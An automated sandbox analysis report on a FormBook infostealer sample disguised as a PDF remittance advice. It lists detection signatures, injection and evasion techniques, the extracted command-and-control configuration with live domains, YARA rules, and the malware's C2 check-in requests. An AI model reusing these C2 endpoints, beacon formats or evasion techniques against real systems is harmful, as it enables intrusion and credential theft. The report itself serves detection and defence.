Loading ...

Play interactive tourEdit tour

Analysis Report Remittance Advice pdf.exe

Overview

General Information

Sample Name:Remittance Advice pdf.exe
Analysis ID:403087
MD5:f597d74f90311fa86a708b211892d76f
SHA1:2d8f68efc677df2b2958e5631bffaf610a5661ab
SHA256:84d44657f148197e79e253ab0b50cdd8003e2b760318f9ab760b47fe4e25a594
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Remittance Advice pdf.exe (PID: 6452 cmdline: 'C:\Users\user\Desktop\Remittance Advice pdf.exe' MD5: F597D74F90311FA86A708B211892D76F)
    • DpiScaling.exe (PID: 6224 cmdline: C:\Windows\System32\DpiScaling.exe MD5: 302B1BBDBF4D96BEE99C6B45680CEB5E)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 7160 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • WWAHost.exe (PID: 4868 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 7024 cmdline: /c del 'C:\Windows\SysWOW64\DpiScaling.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.brandonprattdrums.com/nt8e/"], "decoy": ["cfwg123.com", "gazipasadan.xyz", "careogeen.com", "zitatewelten.com", "thecvpro.com", "viltais.com", "benimed.today", "rogerecameron.com", "courtclassesathome.com", "yakin-hm.com", "vidasanayprospera.com", "mandirana.com", "skybluebet.com", "rescuedpetsarewonderful.com", "solisdq.info", "affiliateside.com", "homewellliving.com", "missteenroyaluniverse.com", "bajrangproperties.com", "bundleobliss.com", "donotwasteyourvote.com", "shuziyuming.com", "sabalotours.com", "awesomebikeco.com", "katysteakhouse.com", "journeyofcamera.com", "electricmotorcyclecollector.com", "hincodrones.com", "rfscustominteriors.com", "agilelocker.com", "jobheap.com", "vrolin.com", "tudeladirecto.com", "tqwhspace.com", "ricoemail.com", "highfashionexchange.com", "simplicty-in-life.com", "3907allendale.com", "mostposh.com", "poshzip.com", "mohdnaved.com", "lostintraveland.com", "elitephoneskillsacademy.com", "coastalconciergebyliz.com", "enbranding.com", "tibetanartacademy.com", "intothenest.com", "andygreenphd.com", "whereistheherb.store", "thehimawaribrand.com", "wapdevs.com", "sewadorbsclothing.com", "citestaccnt1598677757.com", "radiosteel.com", "cover-solutions.com", "feeneylaminate.com", "minnesotawake.com", "eneralysis.com", "gomashio-taste.com", "neutralplasmaexchange.com", "liancaiwangv1.com", "jobonlineupdate.com", "runforlunch.com", "fux.xyz"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16079:$sqlite3step: 68 34 1C 7B E1
    • 0x1618c:$sqlite3step: 68 34 1C 7B E1
    • 0x160a8:$sqlite3text: 68 38 2A 90 C5
    • 0x161cd:$sqlite3text: 68 38 2A 90 C5
    • 0x160bb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
    00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      13.2.DpiScaling.exe.10410000.4.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        13.2.DpiScaling.exe.10410000.4.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x75c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7962:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13275:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x12d61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13377:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x134ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x836a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x11fdc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x90e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18357:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x193ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        13.2.DpiScaling.exe.10410000.4.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15279:$sqlite3step: 68 34 1C 7B E1
        • 0x1538c:$sqlite3step: 68 34 1C 7B E1
        • 0x152a8:$sqlite3text: 68 38 2A 90 C5
        • 0x153cd:$sqlite3text: 68 38 2A 90 C5
        • 0x152bb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x153e3:$sqlite3blob: 68 53 D8 7F 8C
        13.2.DpiScaling.exe.10410000.4.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          13.2.DpiScaling.exe.10410000.4.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.brandonprattdrums.com/nt8e/"], "decoy": ["cfwg123.com", "gazipasadan.xyz", "careogeen.com", "zitatewelten.com", "thecvpro.com", "viltais.com", "benimed.today", "rogerecameron.com", "courtclassesathome.com", "yakin-hm.com", "vidasanayprospera.com", "mandirana.com", "skybluebet.com", "rescuedpetsarewonderful.com", "solisdq.info", "affiliateside.com", "homewellliving.com", "missteenroyaluniverse.com", "bajrangproperties.com", "bundleobliss.com", "donotwasteyourvote.com", "shuziyuming.com", "sabalotours.com", "awesomebikeco.com", "katysteakhouse.com", "journeyofcamera.com", "electricmotorcyclecollector.com", "hincodrones.com", "rfscustominteriors.com", "agilelocker.com", "jobheap.com", "vrolin.com", "tudeladirecto.com", "tqwhspace.com", "ricoemail.com", "highfashionexchange.com", "simplicty-in-life.com", "3907allendale.com", "mostposh.com", "poshzip.com", "mohdnaved.com", "lostintraveland.com", "elitephoneskillsacademy.com", "coastalconciergebyliz.com", "enbranding.com", "tibetanartacademy.com", "intothenest.com", "andygreenphd.com", "whereistheherb.store", "thehimawaribrand.com", "wapdevs.com", "sewadorbsclothing.com", "citestaccnt1598677757.com", "radiosteel.com", "cover-solutions.com", "feeneylaminate.com", "minnesotawake.com", "eneralysis.com", "gomashio-taste.com", "neutralplasmaexchange.com", "liancaiwangv1.com", "jobonlineupdate.com", "runforlunch.com", "fux.xyz"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Remittance Advice pdf.exeReversingLabs: Detection: 34%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 13.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.DpiScaling.exe.10410000.4.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Remittance Advice pdf.exeJoe Sandbox ML: detected
          Source: 20.2.WWAHost.exe.3f91b8.1.unpackAvira: Label: TR/Patched.Ren.Gen8
          Source: 20.2.WWAHost.exe.3b87858.5.unpackAvira: Label: TR/Patched.Ren.Gen8
          Source: 13.2.DpiScaling.exe.10410000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Remittance Advice pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.6:49722 version: TLS 1.2
          Source: Binary string: WWAHost.pdb source: DpiScaling.exe, 0000000D.00000002.500290507.0000000004650000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000E.00000000.478459027.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: WWAHost.pdbUGP source: DpiScaling.exe, 0000000D.00000002.500290507.0000000004650000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: DpiScaling.exe, 0000000D.00000002.500837817.0000000004A2F000.00000040.00000001.sdmp, WWAHost.exe, 00000014.00000002.599807554.000000000376F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: DpiScaling.exe, WWAHost.exe
          Source: Binary string: DpiScaling.pdb source: WWAHost.exe, 00000014.00000002.596791427.00000000003F9000.00000004.00000020.sdmp
          Source: Binary string: DpiScaling.pdbGCTL source: WWAHost.exe, 00000014.00000002.596791427.00000000003F9000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000E.00000000.478459027.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 4x nop then pop edi13_2_10425033
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 4x nop then pop edi13_2_1041C119
          Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 4x nop then pop esi13_2_104251F6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop edi20_2_02715033
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop edi20_2_0270C119
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop esi20_2_027151F6

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49745 -> 85.159.66.93:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49745 -> 85.159.66.93:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49745 -> 85.159.66.93:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49747 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49747 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49747 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 199.59.242.153:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49750 -> 198.54.117.212:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49750 -> 198.54.117.212:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49750 -> 198.54.117.212:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.brandonprattdrums.com/nt8e/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.gazipasadan.xyz
          Source: C:\Windows\explorer.exeDNS query: www.fux.xyz
          Source: global trafficHTTP traffic detected: GET /nt8e/?blm=IHJLWq3Ti4lOD4kq8gztCbzA17cUlgM1ZPUn0ujbMY4leENIWoOfJYoGYHcW17z38P8xUAoycA==&tVTd=M6AhI HTTP/1.1Host: www.gazipasadan.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nt8e/?blm=TToywE07YkGPr1SSYVo5Zl0eXSAn7PGjTs4OR5iBsoxazNcvt6mcqDrbAAXGiUlQyBjZ6mutAA==&tVTd=M6AhI HTTP/1.1Host: www.sewadorbsclothing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nt8e/?blm=y/4CZD0u6UTnndZ84eN1F0ffB2o9AcFBv2a7yWGMbwZk5TncQjhg8LsZLuBmMcZQmigo4rhukg==&tVTd=M6AhI HTTP/1.1Host: www.fux.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
          Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /nt8e/?blm=IHJLWq3Ti4lOD4kq8gztCbzA17cUlgM1ZPUn0ujbMY4leENIWoOfJYoGYHcW17z38P8xUAoycA==&tVTd=M6AhI HTTP/1.1Host: www.gazipasadan.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nt8e/?blm=TToywE07YkGPr1SSYVo5Zl0eXSAn7PGjTs4OR5iBsoxazNcvt6mcqDrbAAXGiUlQyBjZ6mutAA==&tVTd=M6AhI HTTP/1.1Host: www.sewadorbsclothing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nt8e/?blm=y/4CZD0u6UTnndZ84eN1F0ffB2o9AcFBv2a7yWGMbwZk5TncQjhg8LsZLuBmMcZQmigo4rhukg==&tVTd=M6AhI HTTP/1.1Host: www.fux.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 03 May 2021 16:51:49 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 0000000E.00000000.473814734.0000000008551000.00000004.00000001.sdmpString found in binary or memory: http://schemas.micr
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 0000000E.00000000.439337198.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.6:49722 version: TLS 1.2

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 13.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.DpiScaling.exe.10410000.4.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
